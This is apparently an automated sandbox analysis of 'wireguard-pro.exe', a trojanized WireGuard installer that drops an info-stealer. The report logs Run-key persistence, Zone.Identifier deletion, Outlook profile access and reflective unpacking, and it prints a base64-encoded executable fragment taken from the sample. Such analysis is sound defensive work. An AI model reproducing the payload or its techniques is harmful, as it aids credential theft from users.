Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /installmanagerservice
Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /ui 888 884 896 904

Source: C:\Users\user\Desktop\wireguard-pro.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\wireguard-pro.exe

File created: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Jump to behavior

Source: wireguard-pro.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\wireguard-pro.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll

Source: wireguard-pro.exe, Program.cs

Base64 encoded string: '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

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01

Source: HQL82NEF.exe.0.dr, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HQL82NEF.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\WireGuard\wireguard.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\WireGuard\wireguard.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Program Files\WireGuard\wireguard.exe

Window found: window name: SysTabControl32

Source: C:\Users\user\Desktop\wireguard-pro.exe	Automated click: Run
Source: C:\Users\user\Desktop\wireguard-pro.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\WireGuard\wireguard.exe

Window detected: Number of UI elements: 15

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: wireguard-pro.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\WireGuard
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\WireGuard\wg.exe
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\WireGuard\wireguard.exe
Source: C:\Program Files\WireGuard\wireguard.exe	Directory created: C:\Program Files\WireGuard\Data
Source: C:\Program Files\WireGuard\wireguard.exe	Directory created: C:\Program Files\WireGuard\Data\log.bin
Source: C:\Program Files\WireGuard\wireguard.exe	Directory created: C:\Program Files\WireGuard\Data\Configurations

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2FDB79CE-5193-4A39-82BB-E00158CC1533}

Source: wireguard-pro.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox_f4\obj\Debug\firefox_f4.pdb source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1132723462.000000000679B000.00000004.00000020.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe.3.dr
Source:	Binary string: D:\nt-driver-builder\wireguard-nt-0.10\Release\amd64\driver\wireguard.pdbGCTL source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\nt-driver-builder\wireguard-nt-0.10\Release\arm64\driver\wireguard.pdbGCTL source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\Jason A. Donenfeld\Projects\wireguard-nt\Release\amd64\wireguard.pdb source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\nt-driver-builder\wireguard-nt-0.10\Release\arm64\driver\wireguard.pdb source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1132723462.000000000679B000.00000004.00000020.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1132147750.0000000005850000.00000004.08000000.00040000.00000000.sdmp, audddd.exe.3.dr
Source:	Binary string: D:\nt-driver-builder\wireguard-nt-0.10\Release\amd64\driver\wireguard.pdb source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\Jason A. Donenfeld\Projects\wireguard-nt\Release\arm64\setupapihost.pdb source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: HQL82NEF.exe.0.dr, FD.cs	.Net Code: NAW System.Reflection.Assembly.Load(byte[])
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, FD.cs	.Net Code: NAW System.Reflection.Assembly.Load(byte[])
Source: audddd.exe.3.dr, FD.cs	.Net Code: NAW System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_067857D8 push es; ret	3_2_06785984
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785C41 push es; ret	3_2_06785C7C
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785AFB push es; ret	3_2_06785B00
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785AB0 push es; ret	3_2_06785AB4
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785B64 push es; ret	3_2_06785BE4
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785B5D push es; ret	3_2_06785BE4
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785B11 push es; ret	3_2_06785B4C
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785BA9 push es; ret	3_2_06785BE4
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06785811 push es; ret	3_2_06785984
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_067859E1 push es; ret	3_2_06785A1C
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA9B7F push es; ret	3_2_06EA9B80
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06399B70 push es; ret	18_2_06399B80
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06399BC7 push es; ret	18_2_06399B80
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06974960 push es; ret	18_2_06975984
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06974960 push es; ret	18_2_069759D0
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C15 push es; ret	18_2_06975C18
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C11 push es; ret	18_2_06975C14
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C1D push es; ret	18_2_06975C20
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C19 push es; ret	18_2_06975C1C
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C0D push es; ret	18_2_06975C10
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C31 push es; ret	18_2_06975C34
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C25 push es; ret	18_2_06975C28
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C21 push es; ret	18_2_06975C24
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C2D push es; ret	18_2_06975C30
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C29 push es; ret	18_2_06975C2C
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975C41 push es; ret	18_2_06975C7C
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975AC5 push es; ret	18_2_06975B00
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975A2D push es; ret	18_2_06975A68
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975A79 push es; ret	18_2_06975AB4
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975A79 push es; ret	18_2_06975B00
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06975BA9 push es; ret	18_2_06975BE4

Source: wireguard-pro.exe

Static PE information: 0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]

Source: wireguard.exe.4.dr

Static PE information: section name: .symtab

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\wireguard-pro.exe

File written: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File created: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC895.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC8E4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9F4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files\WireGuard\wireguard.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File created: C:\Users\user\AppData\Local\Temp\tmpG47.tmp (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC944.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9A4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9E3.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\wireguard-pro.exe	File created: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Jump to dropped file
Source: C:\Users\user\Desktop\wireguard-pro.exe	File created: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files\WireGuard\wg.exe	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC895.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC8E4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9F4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC944.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9A4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC9E3.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WireGuard.lnk

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File opened: C:\Users\user\AppData\Roaming\audddd\audddd.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File opened: C:\Users\user\AppData\Roaming\audddd\audddd.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\wireguard-pro.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
